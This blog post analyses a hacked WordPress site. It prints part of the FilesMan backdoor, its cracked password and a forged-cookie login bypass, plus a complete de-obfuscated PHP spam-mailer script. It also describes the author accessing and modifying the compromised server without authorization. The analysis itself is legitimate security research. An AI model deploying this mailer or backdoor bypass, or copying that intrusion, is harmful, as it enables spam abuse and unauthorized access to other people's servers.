Insight into a Spam Network

While browsing around the net I often run into websites that have been compromised. I recently discovered a website that was hosting the filesman backdoor, redirecting users to malicious sites, and allowing spammers to send mail from the web server. I thought it might be fun to take a look around and see if I could find anything interesting.

Identifying the infected site

The website that I investigated was running a WordPress blog. Directory indexing was enabled on the website and it was possible to see the contents of the uploads directory.

Anytime you see a php script in the uploads directory of a WordPress site it is probably a bad sign. Clicking on the info.php file loads a page that requests a password to log in. This was definitely a good indicator that the site was hosting a backdoor shell.
Another interesting thing in the uploads directory was the toolbox.zip file. I downloaded the zip found and at first glance it appeared to be a free WordPress theme. Further inspection of the contents led me to a copy of the info.php file that was requesting the password.

The filesman backdoor

Looking through the source of the info.php file you can clearly see that it is a backdoor. The script tries to avoid getting indexed by crawlers and contains an MD5 hash of the password required to gain access.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

<?php $auth_pass = "866fd58d77526c1bda8771b5b21d5b11"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251';   if(!empty($_SERVER['HTTP_USER_AGENT'])) {     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {         header('HTTP/1.0 404 Not Found');         exit;     } }   /* Removed some code here */   function wsoLogin() {     die("<pre align=center><form method=post>Pass: <input type=password name=pass><input type=submit value='>>'></form></pre> &copy; Access denied! :)"); }   function WSOsetcookie($k, $v) {     $_COOKIE[$k] = $v;     setcookie($k, $v); }   if(!empty($auth_pass)) {     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))         WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);       if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))         wsoLogin(); }   /* The rest of the code has been removed */

Bypassing the shell password protection

I was able to google for the hash value to determine that the plaintext password was ‘nhzgrf’. What I find amusing is that you can completely bypass the authentication by creating your own cookie :D
Take a look at the line that generates the cookie value

1 2	if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))         WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

It creates a cookie where the name is the MD5 value of $_SERVER['HTTP_HOST'] and the value is the password hash. So if the name of the website was example.com our cookie would look like this:
5ababd603b22780302dd8d83498e5172=866fd58d77526c1bda8771b5b21d5b11
Nice try on the authentication! Maybe next time you should look at using the built in session management in PHP. Of course this required that I have access to the source of the shell to get the MD5 hash of the password.

Finding the spam script

Reviewing the Apache logs revealed a ton of requests for a functions.php file that is in the uploads directory. The requests were showing up on a regular basis from a number of different IP addresses. External addresses should not be making POST requests to any scripts in this directory!

1	213.57.145.11 - - [26/Apr/2013:23:54:18 +1000] "POST /wp-content/uploads/2013/functions.php HTTP/1.1" 200 2294

The script was obfuscated using a few simple techniques but nothing really fancy. After de-obfuscating the script and renaming most of the variables to something more meaningful it was easy to see what the script does.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217

<?php   // Be a little stealthy @error_reporting(0); @ini_set('error_log', NULL); @ini_set('log_errors', 0);   // Check for the required post data if (count($_POST) < 2) {     die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321)); }   // Get the post data $post_encoded = false; foreach (array_keys($_POST) as $v3c6e0b8a) {     switch ($v3c6e0b8a[0]) {         case chr(108)://l             $post_l = $v3c6e0b8a;             break;         case chr(100)://d             $post_d = $v3c6e0b8a;             break;         case chr(109)://m             $post_m = $v3c6e0b8a;             break;         case chr(101);//e             // If this is set our post data has been encoded             $post_encoded = true;             break;     } }   // Check for the 'l' and 'd' post variables if ($post_l === '' || $post_d === '')     die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));   // Get a list of the disabled PHP functions $disabled_functions = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));   $post_l_value = @$_POST[$post_l]; $post_d = @$_POST[$post_d]; $post_m = @$_POST[$post_m];   // Deal with the encoded post data if we have to if ($post_encoded) {     $post_l_value = decode_post_value($post_l_value);     $post_d = decode_post_value($post_d);     $post_m = decode_post_value($post_m); }   // URL decode the data $post_l_value = urldecode(stripslashes($post_l_value)); $post_d = urldecode(stripslashes($post_d)); $post_m = urldecode(stripslashes($post_m));   // Check if we need to split data out from this format first;last;email@host.com if (strpos($post_l_value, ';', 1) != false) {     list($first_name, $last_name, $to_emailAddr) = preg_split('/;/', strtolower($post_l_value));     $first_name = ucfirst($first_name);     $last_name = ucfirst($last_name);     $to_hostname = next(explode('@', $to_emailAddr));     if ($last_name == '' || $first_name == '') {         $last_name = $first_name = '';         $post_l_value = $to_emailAddr;     } else {         $post_l_value = "\”$first_name $last_name\” <$to_emailAddr>";     } // If we didn't find any ';' then we only have an email address } else {     $last_name = $first_name = '';     $to_emailAddr = strtolower($post_l_value);     $to_hostname = next(explode('@', $post_l_value)); }   // Parse out the data for the email to send preg_match('|<USER>(.*)</USER>|imsU', $post_d, $from_user); $from_user = $from_user[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $post_d, $from_name); $from_name = $from_name[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $post_d, $subject_line); $subject_line = $subject_line[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $post_d, $email_body); $email_body = $email_body[1];   // Replace %R_NAME% and %R_LNAME% placeholders with first and last name // in the subject line and the email body. $subject_line = str_replace("%R_NAME%", $first_name, $subject_line); $subject_line = str_replace("%R_LNAME%", $last_name, $subject_line); $email_body = str_replace("%R_NAME%", $first_name, $email_body); $email_body = str_replace("%R_LNAME%", $last_name, $email_body); $from_hostname = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);   // This snippet of code doesn't appear to be needed if (ne667da76($from_hostname) || @ini_get('safe_mode'))     $v10497e3f = false; else     $v10497e3f = true;   // Build up the from email address. $from_email = "$from_user@$from_hostname"; if ($from_name != '')     $from_email_formatted = "$from_name <$from_email>"; else     $from_email_formatted = $from_email;   // Create the email headers $mail_headers_2 = "From: $from_email_formatted\r\n"; $mail_headers_2 .= "Reply-To: $from_email_formatted\r\n"; $mail_headers_3 = "X-Priority: 3 (Normal)\r\n"; $mail_headers_3 .= "MIME-Version: 1.0\r\n"; $mail_headers_3 .= "Content-Type: text/html; charset=\”iso-8859-1\”\r\n"; $mail_headers_3 .= "Content-Transfer-Encoding: 8bit\r\n"; $mail_headers_1 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $mail_headers_2; $mail_headers_1 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$from_hostname>\r\n"; $mail_headers_1 .= "To: $post_l_value\r\n"; $mail_headers_1 .= "Subject: $subject_line\r\n"; $mail_headers_1 .= $mail_headers_3; $mail_headers_body = $mail_headers_1 . "\r\n" . $email_body;   // Determine the mail server to use if ($post_m == '')     $post_m = getMxHost($to_hostname);   // Send the email if (($vb4a88417 = sendMail($from_email, $to_emailAddr, $mail_headers_body, $from_hostname, $post_m)) == 0) {     die(chr(79) . chr(75) . md5(1234567890) . "+1"); } else {     echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417"; }   // Checks if the input is formatted as an IP address but doesn't appear to be needed function ne667da76($v957b527b) {     return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); }   // Sends the spam email function sendMail($from_email_formatted, $to_email, $mail_headers_body, $from_hostname, $post_m) {     // Work around disabled functions if possible     global $disabled_functions;     if (!in_array('fsockopen', $disabled_functions))         $fp_mail_stream = @fsockopen($post_m, 25, $errno, $errstr, 20);     elseif (!in_array('pfsockopen', $disabled_functions))         $fp_mail_stream = @pfsockopen($post_m, 25, $errno, $errstr, 20);     elseif (!in_array('stream_socket_client', $disabled_functions) && function_exists("stream_socket_client"))         $fp_mail_stream = @stream_socket_client("tcp://$post_m:25", $errno, $errstr, 20);     else         return -1;     if (!$fp_mail_stream) {         return 1;     } else {         // Send the spam mail         $post_d = getResponse($fp_mail_stream);         @fputs($fp_mail_stream, "EHLO $from_hostname\r\n");         $strResponse = getResponse($fp_mail_stream);         if (substr($strResponse, 0, 3) != 250)             return "2+($to_email)+" . preg_replace('/(\r\n|\r|\n)/', '|', $strResponse);         @fputs($fp_mail_stream, "MAIL FROM:<$from_email_formatted>\r\n");         $strResponse = getResponse($fp_mail_stream);         if (substr($strResponse, 0, 3) != 250)             return "3+($to_email)+" . preg_replace('/(\r\n|\r|\n)/', '|', $strResponse);         @fputs($fp_mail_stream, "RCPT TO:<$to_email>\r\n");         $strResponse = getResponse($fp_mail_stream);         if (substr($strResponse, 0, 3) != 250 && substr($strResponse, 0, 3) != 251)             return "4+($to_email)+" . preg_replace('/(\r\n|\r|\n)/', '|', $strResponse);         @fputs($fp_mail_stream, "DATA\r\n");         $strResponse = getResponse($fp_mail_stream);         if (substr($strResponse, 0, 3) != 354)             return "5+($to_email)+" . preg_replace('/(\r\n|\r|\n)/', '|', $strResponse);         @fputs($fp_mail_stream, $mail_headers_body . "\r\n.\r\n");         $strResponse = getResponse($fp_mail_stream);         if (substr($strResponse, 0, 3) != 250)             return "6+($to_email)+" . preg_replace('/(\r\n|\r|\n)/', '|', $strResponse);         @fputs($fp_mail_stream, "QUIT\r\n");         @fclose($fp_mail_stream);         return 0;     } }   // Helper function function getResponse($fp_mail_stream) {     $strResp = '';     while ($buffer  = @fgets($fp_mail_stream, 4096)) {         $strResp .= $buffer ;         if (substr($buffer , 3, 1) == ' ')             break;     }     return $strResp; }   // Determines the mail server to use function getMxHost($to_hostname) {     global $disabled_functions;     if (!in_array('getmxrr', $disabled_functions) && function_exists("getmxrr")) {         @getmxrr($to_hostname, $mxhosts, $weight);         if (count($mxhosts) === 0)             return '127.0.0.1';         $v865c0c0b = array_keys($weight, min($weight));         return $mxhosts[$v865c0c0b[0]];     } else {         return '127.0.0.1';     } }   // Decodes the post data if the 'e' post variable was set function decode_post_value($b64_val) {     $b64_val = base64_decode($b64_val);     $decoded_string = '';     for ($count = 0; $count < strlen($b64_val); $count++)         $decoded_string .= chr(ord($b64_val[$count]) ^ 2);     return $decoded_string; } ?>

Collecting information on the bots

I thought it would be fun to spy on the messages that were being sent from this compromised machine. What IP’s are posting to the script? Who are the messages going to? What types of spam are being sent?
In order to collect this information I made some modifications to the spam script. I added some code to collect the IP of the system that makes the POST request. A copy of each message sent along with the originating IP was sent to an email address that I created to monitor the spam.
After collecting over 38,000 spam emails here is what I was able to find:

• 37,914 Unique Email Addresses
• 1,219 Unique Bot IP’s (The IP addresses posting to the compromised server)
• 3,139 Unique Malicious Links

Using MaxMind’s GeoIP database I was able to create a nifty chart showing where the majority of the bots are located that are generating and posting the spam messages.
Bot Distribution by CountryItalyFranceMexicoSpainBrazilKazakhstanPeruPolandIndiaOther15.6%9.5%8.6%8.1%